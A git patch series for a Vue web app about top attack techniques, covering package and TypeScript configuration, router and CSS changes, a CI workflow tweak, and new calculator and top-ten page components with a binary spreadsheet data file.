"https://registry.npmjs.org/word-wrap/-/word-wrap-1.2.5.tgz", - "integrity": "sha512-BN22B5eaMMI9UMtjrGd5g5eCYPpCPDUy0FJXbYsaT5zYxjFOckS53SQDE3pWkVoWpHXVb3BrYcEN4Twa55B5cA==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, "node_modules/wrappy": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", diff --git a/package.json b/package.json index a91781b..d3a020c 100644 --- a/package.json +++ b/package.json @@ -1,11 +1,13 @@ { - "name": "simple-project", + "name": "top-attack-techniques", "version": "0.0.0", "scripts": { "dev": "vite", - "build": "vite build", - "preview": "vite preview --port 4173", - "lint": "eslint . --ext .vue,.js,.jsx,.cjs,.mjs --fix --ignore-path .gitignore" + "build": "run-p type-check \"build-only {@}\" --", + "preview": "vite preview", + "build-only": "vite build", + "type-check": "vue-tsc --noEmit -p tsconfig.app.json --composite false", + "lint": "eslint . --ext .vue,.js,.jsx,.cjs,.mjs,.ts,.tsx,.cts,.mts --fix --ignore-path .gitignore" }, "dependencies": { "pinia": "^2.0.29", @@ -15,15 +17,20 @@ }, "devDependencies": { "@rushstack/eslint-patch": "^1.1.0", + "@tsconfig/node18": "^18.2.4", "@typescript-eslint/eslint-plugin": "^5.4.0", "@typescript-eslint/parser": "^5.4.0", "@vitejs/plugin-vue": "^4.0.0", + "@vue/eslint-config-typescript": "^13.0.0", + "@vue/tsconfig": "^0.5.1", "autoprefixer": "^10.4.7", "eslint": "^8.5.0", "eslint-plugin-vue": "^9.0.0", + "npm-run-all2": "^6.1.2", "postcss": "^8.4.14", "tailwindcss": "^3.1.4", "typescript": "4.7", - "vite": "^4.0.4" + "vite": "^4.0.4", + "vue-tsc": "^2.0.7" } } diff --git a/release-please-config.json b/release-please-config.json new file mode 100644 index 0000000..601b6d0 --- /dev/null +++ b/release-please-config.json @@ -0,0 +1,71 @@ +{ + "prerelease": true, + "bump-minor-pre-major": true, + "bump-patch-for-minor-pre-major": true, + "changelog-sections": [ + { + "type": "feat", + "section": "Features" + }, + { + "type": "feature", + "section": "Features" + }, + { + "type": "fix", + "section": "Bug Fixes" + }, + { + "type": "perf", + "section": "Performance Improvements" + }, + { + "type": "revert", + "section": "Reverts" + }, + { + "type": "docs", + "section": "Documentation", + "hidden": true + }, + { + "type": "style", + "section": "Styles", + "hidden": true + }, + { + "type": "chore", + "section": "Miscellaneous Chores", + "hidden": true + }, + { + "type": "refactor", + "section": "Code Refactoring", + "hidden": true + }, + { + "type": "test", + "section": "Tests", + "hidden": true + }, + { + "type": "build", + "section": "Build System", + "hidden": true + }, + { + "type": "ci", + "section": "Continuous Integration", + "hidden": true + } + ], + "include-v-in-tag": true, + "include-component-in-tag": true, + "packages": { + ".": { + "component": "top_attack_techniques", + "release-type": "node", + "initial-version": "0.0.0" + } + } +} \ No newline at end of file diff --git a/src/App.vue b/src/App.vue index 4b0b6ba..f06edc4 100644 --- a/src/App.vue +++ b/src/App.vue @@ -1,15 +1,15 @@ diff --git a/src/assets/arrow-right.svg b/src/assets/arrow-right.svg new file mode 100644 index 0000000..5060271 --- /dev/null +++ b/src/assets/arrow-right.svg @@ -0,0 +1,22 @@ + + + + \ No newline at end of file diff --git a/src/assets/book.svg b/src/assets/book.svg new file mode 100644 index 0000000..4c4edfe --- /dev/null +++ b/src/assets/book.svg @@ -0,0 +1,12 @@ + + + + + + + + + + + + diff --git a/src/assets/calculator.svg b/src/assets/calculator.svg new file mode 100644 index 0000000..fe03cd9 --- /dev/null +++ b/src/assets/calculator.svg @@ -0,0 +1,8 @@ + + + + + + + + diff --git a/src/assets/help.svg b/src/assets/help.svg new file mode 100644 index 0000000..26aa246 --- /dev/null +++ b/src/assets/help.svg @@ -0,0 +1,4 @@ + + + + diff --git a/src/assets/list.svg b/src/assets/list.svg new file mode 100644 index 0000000..8a9707a --- /dev/null +++ b/src/assets/list.svg @@ -0,0 +1,8 @@ + + + + + + + + diff --git a/src/assets/menu.svg b/src/assets/menu.svg new file mode 100644 index 0000000..9e6469b --- /dev/null +++ b/src/assets/menu.svg @@ -0,0 +1,4 @@ + + + + diff --git a/src/components/Calculator.vue b/src/components/CalculatorPage.vue similarity index 100% rename from src/components/Calculator.vue rename to src/components/CalculatorPage.vue diff --git a/src/components/Help.vue b/src/components/HelpPage.vue similarity index 100% rename from src/components/Help.vue rename to src/components/HelpPage.vue diff --git a/src/components/Home.vue b/src/components/Home.vue deleted file mode 100644 index dd0a868..0000000 --- a/src/components/Home.vue +++ /dev/null @@ -1,22 +0,0 @@ - - - - - \ No newline at end of file diff --git a/src/components/HomePage.vue b/src/components/HomePage.vue new file mode 100644 index 0000000..6312e41 --- /dev/null +++ b/src/components/HomePage.vue @@ -0,0 +1,95 @@ + + + + + diff --git a/src/components/Methodology.vue b/src/components/MethodologyPage.vue similarity index 100% rename from src/components/Methodology.vue rename to src/components/MethodologyPage.vue diff --git a/src/components/Navigation.vue b/src/components/Navigation.vue deleted file mode 100644 index e1402f9..0000000 --- a/src/components/Navigation.vue +++ /dev/null @@ -1,46 +0,0 @@ - - - - - diff --git a/src/components/NavigationMenu.vue b/src/components/NavigationMenu.vue new file mode 100644 index 0000000..d107e38 --- /dev/null +++ b/src/components/NavigationMenu.vue @@ -0,0 +1,64 @@ + + + + + diff --git a/src/components/SectionItem.vue b/src/components/SectionItem.vue new file mode 100644 index 0000000..d2c988e --- /dev/null +++ b/src/components/SectionItem.vue @@ -0,0 +1,39 @@ + + + + + diff --git a/src/components/TopTen.vue b/src/components/TopTen.vue new file mode 100644 index 0000000..2726d27 --- /dev/null +++ b/src/components/TopTen.vue @@ -0,0 +1,17 @@ + + + + + diff --git a/src/index.css b/src/index.css index 0d6c614..cf765e4 100644 --- a/src/index.css +++ b/src/index.css @@ -2,22 +2,75 @@ @tailwind components; @tailwind utilities; +/* Global Styles */ +body { + margin: 0; +} #page-body { - @apply mt-20 + @apply pt-20 bg-white text-ctid-black min-h-screen } #app { - font-family: "Roboto Condensed", sans-serif; + @apply top-0 m-0; + font-family: "Roboto", sans-serif; +} + +h1, h2, h3, h4, h5, h6 { + @apply uppercase; + font-family: "Fira Sans Extra Condensed", sans-serif; +} +.link { + @apply hover:text-ctid-light-purple text-lg; + font-family: "Fira Sans Extra Condensed", sans-serif; +} +.btn-primary { + @apply bg-ctid-light-purple hover:bg-ctid-navy hover:text-white my-4 py-4 uppercase font-bold text-lg; + font-family: "Fira Sans Extra Condensed", sans-serif; +} + +/* Navigation */ +.navbar { + @apply fixed bg-ctid-navy text-white pt-1 w-full top-0 z-50 +} +.navbar h1 { + @apply my-auto font-medium text-xl uppercase w-max +} + +/* Homepage */ + +.hero { + @apply bg-ctid-navy min-h-[100vh] -mt-20 lg:pt-2 xl:pb-10 pt-20 pb-20 text-white; +} +.hero .title { + @apply 2xl:w-3/5 xl:w-2/3 mx-auto lg:mt-60 mt-20 lg:flex gap-6 +} +.hero .title h1 { + @apply uppercase text-6xl font-semibold lg:my-auto } +/* Primevue Overrides */ .p-tabmenu .p-tabmenu-nav .p-tabmenuitem .p-menuitem-link { border-top-right-radius: 0; border-top-left-radius: 0; } -.p-menuitem-link { - @apply bg-mitre-primary-purple uppercase; +.p-tabmenu .p-menuitem-link { + @apply bg-ctid-navy uppercase text-white hover:text-ctid-light-purple; font-family: "Roboto Condensed", sans-serif; } +.p-menubar .p-menuitem-link, .p-menubar { + @apply uppercase font-medium ; + font-family: "Fira Sans Extra Condensed", sans-serif; + +} .p-menuitem-text { @apply my-2 -} \ No newline at end of file +} +.p-tabmenu-ink-bar { + @apply bg-ctid-light-purple; +} +.p-highlight .p-menuitem-text { + @apply text-ctid-light-purple +} +.p-menubar-root-list { + @apply w-60 -ml-40 +} diff --git a/src/router/index.ts b/src/router/index.ts index c371c85..f188830 100644 --- a/src/router/index.ts +++ b/src/router/index.ts @@ -1,34 +1,40 @@ import { createRouter, createWebHistory } from "vue-router"; -import Home from "@/components/Home.vue"; -import Methodology from "@/components/Methodology.vue"; -import Help from "@/components/Help.vue"; -import Calculator from "@/components/Calculator.vue"; +import HomePage from "@/components/HomePage.vue"; +import MethodologyPage from "@/components/MethodologyPage.vue"; +import TopTen from "@/components/TopTen.vue"; +import HelpPage from "@/components/HelpPage.vue"; +import CalculatorPage from "@/components/CalculatorPage.vue"; const routes = [ { path: "/", name: "home", - component: Home, + component: HomePage, }, { path: "/methodology", name: "methodology", - component: Methodology, + component: MethodologyPage, }, { path: "/help", name: "help", - component: Help, + component: HelpPage, }, { path: "/calculator", name: "calculator", - component: Calculator, + component: CalculatorPage, + }, + { + path: "/top-10-lists", + name: "top-10-lists", + component: TopTen, }, ]; const router = createRouter({ - history: createWebHistory(), + history: createWebHistory(import.meta.env.BASE_URL), routes: routes, }); diff --git a/tailwind.config.js b/tailwind.config.js index ad5862e..b18754f 100644 --- a/tailwind.config.js +++ b/tailwind.config.js @@ -5,17 +5,11 @@ module.exports = { theme: { extend: { colors: { - mitre: { - blue: "#005B94", - highlighter: "#FFF601", - "dark-navy": "#0B2338", - navy: "#0D2F4F", - "light-blue": "#87DEFF", - black: "#111921", - "dark-gray": "#7E8284", - silver: "#D4D4D3", - "light-silver": "#F1F3F4", + ctid: { "primary-purple": "#5C6FC6", + navy: "#212C5E", + black: "#0B2338", + "light-purple": "#BCA9DD", }, }, }, diff --git a/tsconfig.app.json b/tsconfig.app.json new file mode 100644 index 0000000..0beb93b --- /dev/null +++ b/tsconfig.app.json @@ -0,0 +1,13 @@ +{ + "extends": "@vue/tsconfig/tsconfig.dom.json", + "include": ["env.d.ts", "src/**/*", "src/**/*.vue", "src/**/*.json"], + "exclude": ["src/**/__tests__/*"], + "compilerOptions": { + "composite": true, + "baseUrl": ".", + "paths": { + "@/*": ["./src/*"] + }, + "types": ["vite/client"] + } +} diff --git a/tsconfig.json b/tsconfig.json index 99f3e54..66b5e57 100644 --- a/tsconfig.json +++ b/tsconfig.json @@ -1,10 +1,11 @@ { - "compilerOptions": { - "outDir": "./built", - "allowJs": true, - "target": "es5" + "files": [], + "references": [ + { + "path": "./tsconfig.node.json" }, - "include": [ - "./src/**/*" - ] -} \ No newline at end of file + { + "path": "./tsconfig.app.json" + } + ] +} diff --git a/tsconfig.node.json b/tsconfig.node.json new file mode 100644 index 0000000..a9bf5eb --- /dev/null +++ b/tsconfig.node.json @@ -0,0 +1,18 @@ +{ + "extends": "@tsconfig/node18/tsconfig.json", + "include": [ + "vite.config.*", + "vitest.config.*", + "cypress.config.*", + "nightwatch.conf.*", + "playwright.config.*" + ], + "compilerOptions": { + "composite": true, + "module": "ESNext", + "moduleResolution": "Bundler", + "types": [ + "node" + ] + } +} \ No newline at end of file From 2c40081f6bd28b00a445078130f205eb7a8fb1c8 Mon Sep 17 00:00:00 2001 From: Michael Carenzo <79934822+mikecarenzo@users.noreply.github.com> Date: Thu, 11 Apr 2024 12:59:38 -0400 Subject: [PATCH 03/21] ci: build site previews on `TAT-121-single-page-app-conversion` and on `workflow_dispatch` --- .github/workflows/website-build.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/.github/workflows/website-build.yml b/.github/workflows/website-build.yml index 993fe4f..c350f10 100644 --- a/.github/workflows/website-build.yml +++ b/.github/workflows/website-build.yml @@ -2,8 +2,9 @@ name: Build Website on: push: - branches: [main] + branches: [TAT-121-single-page-app-conversion] pull_request: + workflow_dispatch: # If another web build starts for the same branch, cancel the previous build. This # protects us from two builds trying to upload at the same time and clobbering each From d98cec23d09b061aa241979810962ec3ee55abdf Mon Sep 17 00:00:00 2001 From: Allison Robbins Date: Thu, 18 Apr 2024 08:23:04 -0400 Subject: [PATCH 04/21] TAT-138 create calculator pages (#11) * feat(TAT-138): overall page structure * feat(TAT-138): get filter section scaffolded out * feat(TAT-138): reorganize files * feat(TAT-138): add system config section * feat(TAT-138): fine tune responsive design * feat(TAT-138): finalize changes * feat(TAT-124): foundation for top ten list page * fix (TAT-124): refactor to move calculator code into components and add mobile view * style(TAT-124): added formatting for calculator accordion headers * refactor(TAT-138): integrate two calculator screens and link between them * style(TAT-124): format section selections on calculator page so user can see what they selected * feat(TAT-124): add markdown library for technique descriptions * refactor(TAT-124): reorganize css into component files * refactor(TAT-138): pull in changes from homepage * refactor(TAT-138): lint fix * refactor(TAT-124): download technique list, persist filter selections, open markdown links in new tab * refactor(TAT-124): clean up css and unused code * refactor(TAT-138): requested wording fixes, remove logs, styling fix --------- Co-authored-by: arobbins --- package-lock.json | 24 + package.json | 3 + src/App.vue | 1 + src/components/CalculatorFilters.vue | 43 + src/components/CalculatorPage.vue | 21 - src/components/CalculatorSystem.vue | 44 + src/components/NavigationMenu.vue | 2 +- src/components/SystemScoreSection.vue | 66 + src/components/TopTenAccordion.vue | 38 + src/components/TopTenDetails.vue | 108 + src/components/TopTenSidebar.vue | 58 + src/data/Calculator.xlsx | Bin 0 -> 755028 bytes src/data/TopAttackTechniques.json | 12489 ++++++++++++++++ src/index.css | 80 +- src/router/index.ts | 17 +- src/stores/calculator.store.ts | 75 + src/views/CalculatorPage.vue | 65 + src/{components => views}/HelpPage.vue | 0 src/{components => views}/HomePage.vue | 8 +- src/{components => views}/MethodologyPage.vue | 0 src/{components => views}/TopTen.vue | 0 src/views/TopTenResults.vue | 78 + tailwind.config.js | 6 +- 23 files changed, 13188 insertions(+), 38 deletions(-) create mode 100644 src/components/CalculatorFilters.vue delete mode 100644 src/components/CalculatorPage.vue create mode 100644 src/components/CalculatorSystem.vue create mode 100644 src/components/SystemScoreSection.vue create mode 100644 src/components/TopTenAccordion.vue create mode 100644 src/components/TopTenDetails.vue create mode 100644 src/components/TopTenSidebar.vue create mode 100644 src/data/Calculator.xlsx create mode 100644 src/data/TopAttackTechniques.json create mode 100644 src/stores/calculator.store.ts create mode 100644 src/views/CalculatorPage.vue rename src/{components => views}/HelpPage.vue (100%) rename src/{components => views}/HomePage.vue (93%) rename src/{components => views}/MethodologyPage.vue (100%) rename src/{components => views}/TopTen.vue (100%) create mode 100644 src/views/TopTenResults.vue diff --git a/package-lock.json b/package-lock.json index ec9bde8..cbc8760 100644 --- a/package-lock.json +++ b/package-lock.json @@ -8,7 +8,10 @@ "name": "top-attack-techniques", "version": "0.0.0", "dependencies": { + "downloadjs": "^1.4.7", + "marked": "^12.0.1", "pinia": "^2.0.29", + "primeicons": "^7.0.0", "primevue": "^3.49.1", "vue": "^3.2.37", "vue-router": "^4.1.6" @@ -1708,6 +1711,11 @@ "node": ">=6.0.0" } }, + "node_modules/downloadjs": { + "version": "1.4.7", + "resolved": "https://registry.npmjs.org/downloadjs/-/downloadjs-1.4.7.tgz", + "integrity": "sha512-LN1gO7+u9xjU5oEScGFKvXhYf7Y/empUIIEAGBs1LzUq/rg5duiDrkuH5A2lQGd5jfMOb9X9usDa2oVXwJ0U/Q==" + }, "node_modules/electron-to-chromium": { "version": "1.4.284", "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.4.284.tgz", @@ -2462,6 +2470,17 @@ "sourcemap-codec": "^1.4.8" } }, + "node_modules/marked": { + "version": "12.0.1", + "resolved": "https://registry.npmjs.org/marked/-/marked-12.0.1.tgz", + "integrity": "sha512-Y1/V2yafOcOdWQCX0XpAKXzDakPOpn6U0YLxTJs3cww6VxOzZV1BTOOYWLvH3gX38cq+iLwljHHTnMtlDfg01Q==", + "bin": { + "marked": "bin/marked.js" + }, + "engines": { + "node": ">= 18" + } + }, "node_modules/memorystream": { "version": "0.3.1", "resolved": "https://registry.npmjs.org/memorystream/-/memorystream-0.3.1.tgz", @@ -3013,6 +3032,11 @@ "node": ">= 0.8.0" } }, + "node_modules/primeicons": { + "version": "7.0.0", + "resolved": "https://registry.npmjs.org/primeicons/-/primeicons-7.0.0.tgz", + "integrity": "sha512-jK3Et9UzwzTsd6tzl2RmwrVY/b8raJ3QZLzoDACj+oTJ0oX7L9Hy+XnVwgo4QVKlKpnP/Ur13SXV/pVh4LzaDw==" + }, "node_modules/primevue": { "version": "3.49.1", "resolved": "https://registry.npmjs.org/primevue/-/primevue-3.49.1.tgz", diff --git a/package.json b/package.json index d3a020c..2a32b7e 100644 --- a/package.json +++ b/package.json @@ -10,7 +10,10 @@ "lint": "eslint . --ext .vue,.js,.jsx,.cjs,.mjs,.ts,.tsx,.cts,.mts --fix --ignore-path .gitignore" }, "dependencies": { + "downloadjs": "^1.4.7", + "marked": "^12.0.1", "pinia": "^2.0.29", + "primeicons": "^7.0.0", "primevue": "^3.49.1", "vue": "^3.2.37", "vue-router": "^4.1.6" diff --git a/src/App.vue b/src/App.vue index f06edc4..ba44de3 100644 --- a/src/App.vue +++ b/src/App.vue @@ -5,6 +5,7 @@ + + \ No newline at end of file diff --git a/src/components/CalculatorPage.vue b/src/components/CalculatorPage.vue deleted file mode 100644 index cadbd8d..0000000 --- a/src/components/CalculatorPage.vue +++ /dev/null @@ -1,21 +0,0 @@ - - - - - diff --git a/src/components/CalculatorSystem.vue b/src/components/CalculatorSystem.vue new file mode 100644 index 0000000..bed0348 --- /dev/null +++ b/src/components/CalculatorSystem.vue @@ -0,0 +1,44 @@ + + + + + \ No newline at end of file diff --git a/src/components/NavigationMenu.vue b/src/components/NavigationMenu.vue index d107e38..a81a3e2 100644 --- a/src/components/NavigationMenu.vue +++ b/src/components/NavigationMenu.vue @@ -54,7 +54,7 @@ export default defineComponent({ getActiveIndex() { const route = this.$route.path; return this.items.findIndex(function (item) { - return item.route === route; + return item.route.split("/")[1] === route.split("/")[1]; }); }, }, diff --git a/src/components/SystemScoreSection.vue b/src/components/SystemScoreSection.vue new file mode 100644 index 0000000..54e7f98 --- /dev/null +++ b/src/components/SystemScoreSection.vue @@ -0,0 +1,66 @@ + + + + + \ No newline at end of file diff --git a/src/components/TopTenAccordion.vue b/src/components/TopTenAccordion.vue new file mode 100644 index 0000000..2317a39 --- /dev/null +++ b/src/components/TopTenAccordion.vue @@ -0,0 +1,38 @@ + + + + + \ No newline at end of file diff --git a/src/components/TopTenDetails.vue b/src/components/TopTenDetails.vue new file mode 100644 index 0000000..05b4ec9 --- /dev/null +++ b/src/components/TopTenDetails.vue @@ -0,0 +1,108 @@ + + + + + \ No newline at end of file diff --git a/src/components/TopTenSidebar.vue b/src/components/TopTenSidebar.vue new file mode 100644 index 0000000..6679aee --- /dev/null +++ b/src/components/TopTenSidebar.vue @@ -0,0 +1,58 @@ + + + + + \ No newline at end of file diff --git a/src/data/Calculator.xlsx b/src/data/Calculator.xlsx new file mode 100644 index 0000000000000000000000000000000000000000..5d013edabd4e62b845c1271f6eb6261e776ee2aa GIT binary patch literal 755028 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 